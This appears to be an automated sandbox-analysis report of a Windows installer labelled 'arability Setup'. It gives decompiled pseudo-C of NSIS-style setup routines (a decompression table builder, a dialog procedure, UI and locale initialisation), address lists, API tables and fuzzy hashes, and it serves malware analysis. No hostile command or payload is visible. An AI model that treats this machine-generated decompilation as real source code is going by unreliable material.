						_v36 = 0x42d6b8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6b8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x004068bb
0x004068c3
0x004068c7
0x004068c9
0x004068cc
0x004068ce
0x004068ce
0x004068d0
0x004068d7
0x004068d9
0x004068d9
0x004068df
0x004068f4
0x004068fc
0x004068fe
0x00406900
0x00406903
0x00406904
0x00406904
0x0040690a
0x00000000
0x00000000
0x0040690c
0x0040690f
0x00000000
0x00000000
0x00000000
0x0040690f
0x00406913
0x00406916
0x00406918
0x00406918
0x0040691b
0x00406921
0x00406922
0x00000000
0x00000000
0x00000000
0x00406922
0x00406927
0x0040692a
0x0040692c
0x0040692c
0x00406932
0x00406934
0x00406945
0x00406938
0x0040693c
0x00406be1
0x00000000
0x00406be1
0x00406942
0x00406943
0x00406943
0x0040694b
0x0040694e
0x00406952
0x00406954
0x00406956
0x00406959
0x00000000
0x00000000
0x00406961
0x00406967
0x00406969
0x0040696b
0x0040696c
0x00406981
0x00406981
0x00406984
0x00406986
0x00406986
0x00406988
0x0040698d
0x0040698f
0x00406996
0x00406998
0x004069a0
0x004069a0
0x004069a2
0x004069a3
0x004069b2
0x004069b6
0x004069ba
0x004069bd
0x004069c0
0x004069c5
0x004069c8
0x004069ce
0x004069d5
0x004069db
0x00406bd4
0x00406bd4
0x00406bd9
0x00406be8
0x00000000
0x00000000
0x00000000
0x00406bd9
0x004069e8
0x004069eb
0x004069ee
0x004069f1
0x004069f5
0x00000000
0x00000000
0x00406a00
0x00406a03
0x00406a04
0x00406a06
0x00406a0c
0x00406a0f
0x00000000
0x00000000
0x00406a15
0x00406a16
0x00406a19
0x00406a1c
0x00406a1f
0x00406a25
0x00406a27
0x00406a27
0x00406a2f
0x00406a33
0x00406a38
0x00406a5d
0x00406a63
0x00406a65
0x00406a67
0x00406a6a
0x00406a73
0x00000000
0x00000000
0x00406a3a
0x00406a3a
0x00406a43
0x00406a47
0x00000000
0x00000000
0x00406a58
0x00406a58
0x00406a5b
0x00000000
0x00000000
0x00406a4b
0x00406a4e
0x00406a50
0x00406a54
0x00000000
0x00000000
0x00406a56
0x00406a56
0x00000000
0x00406a58
0x00406a7c
0x00406a82
0x00406a8c
0x00406a8e
0x00406a93
0x00406a95
0x00406acb
0x00406a97
0x00406a97
0x00406a9a
0x00406a9d
0x00406aa7
0x00406aaa
0x00406ab1
0x00406abc
0x00406ac3
0x00406ac3
0x00406acd
0x00406ad0
0x00406ad2
0x00406ad8
0x00406ad8
0x00406ae1
0x00406ae4
0x00406ae9
0x00406af8
0x00406b00
0x00406b05
0x00406b29
0x00406b31
0x00406b35
0x00406b3b
0x00406b07
0x00406b15
0x00406b18
0x00406b1e
0x00406b1e
0x00406b3f
0x00406afa
0x00406afa
0x00406afa
0x00406b50
0x00406b54
0x00406b60
0x00406b5b
0x00406b5e
0x00406b5e
0x00406b68
0x00406b6d
0x00406b75
0x00406b71
0x00406b73
0x00406b73
0x00406b7b
0x00406b7d
0x00406b84
0x00406b8e
0x00406b98
0x00406bb4
0x00406bb8
0x004069fd
0x00406a03
0x00406a04
0x00406a06
0x00406a0c
0x00406a0f
0x00000000
0x00000000
0x00000000
0x00406a0f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b9a
0x00406b9a
0x00406b9a
0x00406b9f
0x00406ba8
0x00406bb1
0x00000000
0x00406bb1
0x00406bbe
0x00406bbe
0x00406bc1
0x00406bc8
0x00406bcb
0x00000000
0x004069ee
0x0040696e
0x00406970
0x00406970
0x00406974
0x00406977
0x00406978
0x00406978
0x00000000
0x00406970
0x004068e4
0x004068ea
0x00000000

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd65a60c0032f06b53db8cd248ad540ce2340f2c19aa7aff15973d4adb3dcb0
Instruction ID: beb3b00561468fd2f1c3efb1f10135777f0892a972df78f043b62560f053f409
Opcode Fuzzy Hash: ebd65a60c0032f06b53db8cd248ad540ce2340f2c19aa7aff15973d4adb3dcb0
Instruction Fuzzy Hash: 31C14B71A00229CBCF14DF68D4905EEB7B2FF99314F26816AD856BB380D734A952CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0291187F, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.704501869.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
Instruction ID: ab442e4c198fbfe2eb9a5851890206a3b775e10e87fb8e21fb576aa05c56d759
Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
Instruction Fuzzy Hash: F1010C78E15208EFCB41DF99D580A9DBBF5EB08620B118596E918E7711E730AE509B40

Uniqueness

Uniqueness Score: -1.00%

Function 02911667, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.704501869.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 004038DB, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 347
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004038DB(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x42a88c = _t33;
					if(_t135 == 0x110) {
						 *0x42f424 = _t117;
						 *0x42a89c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429868 = _t89;
						E00403DC3(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x42ec08);
						 *0x42ebec = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x42a88c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x42f440;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403E0F(0x40b);
						while(1) {
							_t35 =  *0x42a88c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x42f444;
							if(_t37 ==  *0x42f444) {
								E00401410(1);
							}
							__eflags =  *0x42ebec;
							if( *0x42ebec != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x42f444; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x437000);
							E004059FD(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DC3(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DC3(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DC3(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x42f4ac;
							_t136 = _t47;
							if( *0x42f4ac != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DE5(_t122 & 0x00000002);
							EnableWindow( *0x429868, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x42f4ac;
							if( *0x42f4ac == 0) {
								_push( *0x42a89c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x429868);
							}
							E00403DF8();
							E004059DB(0x42a8a0, "arability Setup");
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x42a8a0[lstrlenA(0x42a8a0)]));
							E004059FD(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x42a8a0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)), 0);
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x42ebf8);
									 *0x42a078 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x42f420,  *_t132 +  *0x42ec00 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x42ebf8 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DC3(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x42ebf8, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)), 0);
											ShowWindow( *0x42ebf8, 8);
											E00403E0F(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x42f4ac - _t65;
								if( *0x42f4ac != _t65) {
									goto L61;
								}
								__eflags =  *0x42f4a0 - _t65;
								if( *0x42f4a0 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f424 =  *0x42f424 & 0x00000000;
						__eflags =  *0x42f424;
						EndDialog(_t117,  *0x429c70);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)), 0);
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x42a880, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a880,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E2A(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x42f4ac;
											if( *0x42f4ac == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x429c70 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D9C();
												goto L30;
											}
											E00401410(_t134);
											 *0x429c70 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x42f444 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x429868);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b8a0 == 0 &&  *0x42ebf8 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x42b8a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x004038e5
0x004038ed
0x00403a66
0x00403a6a
0x00403a6e
0x00403a70
0x00403a75
0x00403a80
0x00403a8b
0x00403a90
0x00403a92
0x00403a94
0x00403a97
0x00403a9c
0x00403aaa
0x00403ab7
0x00403abe
0x00403abe
0x00403abf
0x00403abf
0x00403ac4
0x00403ad1
0x00403ad7
0x00403ad9
0x00403b19
0x00403b1e
0x00403b23
0x00403b23
0x00403b28
0x00403b31
0x00403b33
0x00403b38
0x00403b3e
0x00403b42
0x00403b42
0x00403b47
0x00403b4e
0x00000000
0x00000000
0x00403b59
0x00403b5f
0x00000000
0x00000000
0x00403b65
0x00403b68
0x00403b6b
0x00403b70
0x00403b75
0x00403b78
0x00403b7e
0x00403b83
0x00403b86
0x00403b8c
0x00403b91
0x00403b94
0x00403b9a
0x00403ba2
0x00403ba8
0x00403baf
0x00403bb1
0x00403bb8
0x00403bb8
0x00403bb8
0x00403bc2
0x00403bd1
0x00403bdd
0x00403bec
0x00403c03
0x00403c05
0x00403c0b
0x00403c20
0x00403c0d
0x00403c16
0x00403c18
0x00403c18
0x00403c26
0x00403c36
0x00403c3b
0x00403c46
0x00403c47
0x00403c4e
0x00403c58
0x00403c5d
0x00403c5f
0x00000000
0x00403c65
0x00403c65
0x00403c67
0x00000000
0x00000000
0x00403c6d
0x00403c71
0x00403c96
0x00403c9c
0x00403ca2
0x00403ca5
0x00403ccb
0x00403cd1
0x00403cd3
0x00403cd8
0x00403cde
0x00403ce1
0x00403ce4
0x00403cfb
0x00403d07
0x00403d22
0x00403d2c
0x00403d39
0x00403d44
0x00403d44
0x00403cd8
0x00000000
0x00403ca5
0x00403c73
0x00403c79
0x00000000
0x00000000
0x00403c7f
0x00403c85
0x00000000
0x00000000
0x00000000
0x00403c8b
0x00403c5f
0x00403d51
0x00403d5d
0x00403d5d
0x00403d65
0x00000000
0x00403adb
0x00403adb
0x00403ade
0x00403b11
0x00403b11
0x00403b13
0x00000000
0x00000000
0x00000000
0x00403b13
0x00403ae4
0x00403ae9
0x00403aeb
0x00000000
0x00000000
0x00403afb
0x00403b03
0x00000000
0x00403b09
0x004038ff
0x004038ff
0x00403906
0x00403917
0x00403917
0x00403920
0x00403929
0x00403934
0x00403934
0x00403940
0x0040395c
0x0040395f
0x00403974
0x00403977
0x004039ac
0x004039ac
0x004039b2
0x00403a53
0x00000000
0x00403a5c
0x004039b8
0x004039cb
0x004039cd
0x004039cf
0x004039ec
0x004039ef
0x004039f1
0x004039f6
0x004039f9
0x00403a08
0x00403a0b
0x00403a3e
0x00403a51
0x00000000
0x00403a51
0x00403a0d
0x00403a14
0x00403a2d
0x00403a32
0x00403a34
0x00000000
0x00000000
0x00403a36
0x00403a22
0x00403a22
0x00403a24
0x00403a24
0x00000000
0x00403a24
0x00403a17
0x00403a1c
0x00000000
0x00403a1c
0x004039fb
0x00403a02
0x00000000
0x00000000
0x00403a04
0x00000000
0x00403a04
0x004039f3
0x00000000
0x004039f3
0x004039db
0x004039de
0x004039e4
0x004039e6
0x00000000
0x00000000
0x00000000
0x004039e6
0x0040397f
0x00403985
0x00000000
0x00000000
0x00403991
0x00403997
0x00403999
0x00000000
0x00000000
0x0040399f
0x004039a4
0x00000000
0x004039a4
0x00403966
0x00000000
0x00403942
0x00403948
0x00403952
0x00403d6b
0x00403d72
0x00403d80
0x00403d86
0x00403d86
0x00403d90
0x00000000
0x00403d90
0x00403940

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403917
ShowWindow.USER32(?), ref: 00403934
DestroyWindow.USER32 ref: 00403948
SetWindowLongA.USER32 ref: 00403966
IsWindowEnabled.USER32 ref: 00403991
GetDlgItem.USER32 ref: 004039BF
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039DB
IsWindowEnabled.USER32(00000000), ref: 004039DE
GetDlgItem.USER32 ref: 00403A86
GetDlgItem.USER32 ref: 00403A90
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AAA
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AFB
GetDlgItem.USER32 ref: 00403BA2
ShowWindow.USER32(00000000,?), ref: 00403BC2
EnableWindow.USER32(00000000,?), ref: 00403BD1
EnableWindow.USER32(?,?), ref: 00403BEC
SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403C03
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C16
lstrlenA.KERNEL32(0042A8A0,?,0042A8A0,arability Setup), ref: 00403C3F
SetWindowTextA.USER32(?,0042A8A0), ref: 00403C4E
ShowWindow.USER32(?,0000000A), ref: 00403D80

Strings

arability Setup, xrefs: 00403C30

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
String ID: arability Setup
API String ID: 3950083612-1411506553
Opcode ID: 5a0ec1d2c6c6a67fdf7c0c6a9d68d5a67aa73794bec358b76895f6c853a45a70
Instruction ID: 006876bbb85f53b20e6cd7df4346cbfae3e875a0e3379fd521061c3a37ebfb4f
Opcode Fuzzy Hash: 5a0ec1d2c6c6a67fdf7c0c6a9d68d5a67aa73794bec358b76895f6c853a45a70
Instruction Fuzzy Hash: 59C1A071604201ABDB30AF26ED45F273EACEB44716F80093AF556B51F1D678A942CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00403542, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215
stringregistrylibraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00403542() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x42f428;
				_t20 = E00405CEE("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x42a8a0;
					"1033" = 0x7830;
					E004058CF(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8a0);
					__eflags =  *0x42a8a0;
					if(__eflags == 0) {
						E004058CF(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x42a8a0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405939("1033",  *_t20() & 0x0000ffff);
				}
				E0040380E(_t75, _t88);
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42f4a0 =  *0x42f430 & 0x00000020;
				if(E004055C8(_t88, _t84) != 0) {
					L16:
					if(E004055C8(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059FD(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040);
					 *0x42ec08 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E0040380E(_t75, __eflags);
							__eflags =  *0x42f4c0;
							if( *0x42f4c0 != 0) {
								_t31 = E00404E50(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a880, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x42ebc0);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x42ebc0);
								 *0x42ebe4 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x42ebc0);
							}
							_t39 =  *0x42ec00; // 0x0
							_t42 = DialogBoxParamA( *0x42f420, _t39 + 0x00000069 & 0x0000ffff, 0, E004038DB, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x42f420;
						 *0x42ebd4 = _t28;
						_v20 = 0x624e5f;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebe4 =  &_v20;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a880 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x42e3c0;
					E004058CF( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x42f458, 0x42e3c0);
					_t61 =  *0x42e3c0; // 0x59
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x42e3c1;
						 *((char*)(E00405513(0x42e3c1, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059DB(_t84, E004054E8(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E0040552F(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403548
0x00403559
0x00403560
0x00403562
0x00403576
0x0040357b
0x00403591
0x00403596
0x0040359c
0x004035ae
0x004035ae
0x004035b9
0x00403564
0x0040356f
0x0040356f
0x004035be
0x004035c8
0x004035d1
0x004035dd
0x00403663
0x0040366b
0x0040366d
0x00403673
0x00403674
0x00403674
0x0040368a
0x00403690
0x0040369e
0x0040372d
0x00403735
0x0040373f
0x00403744
0x0040374a
0x004037dc
0x004037e1
0x004037e3
0x004037ff
0x00000000
0x004037ff
0x004037e5
0x004037eb
0x004037f3
0x004037f3
0x00000000
0x004037eb
0x00403758
0x00403764
0x0040376a
0x0040376c
0x0040376e
0x00403771
0x0040377a
0x0040377a
0x00403782
0x0040378a
0x0040378c
0x0040378e
0x00403793
0x00403799
0x0040379c
0x004037a2
0x004037a9
0x004037a9
0x004037af
0x004037c8
0x004037d2
0x00000000
0x004037d7
0x00403737
0x00403739
0x00000000
0x004036a4
0x004036a4
0x004036aa
0x004036b4
0x004036bc
